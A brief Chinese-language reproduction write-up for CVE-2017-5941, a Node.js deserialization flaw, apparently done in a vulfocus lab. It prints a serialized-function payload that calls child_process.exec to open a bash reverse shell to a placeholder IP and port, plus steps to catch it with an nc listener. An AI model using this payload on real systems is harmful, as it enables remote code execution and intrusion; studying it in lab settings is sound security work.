Node.JS-CVE-2017-5941

背景：
这是关于node.js反序列化的一个漏洞，该站点接受反序列化数据，并且没有对反序列化的对象做限制，导致的代码执行，可以通过代码执行反弹shell连接服务器。代码执行语句跟node.js执行语句有关。

漏洞编号：
CVE-2017-5941

环境搭建：
1， 打开vulfocus靶场

2，使用浏览器访问

漏洞复现：
1，构造payload
_$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >& /dev/tcp/反弹的IP/端口 0>&1"')}()

2，在VPS上开启nc监听

3，输入用户名密码

4，成功接收反弹拿到flag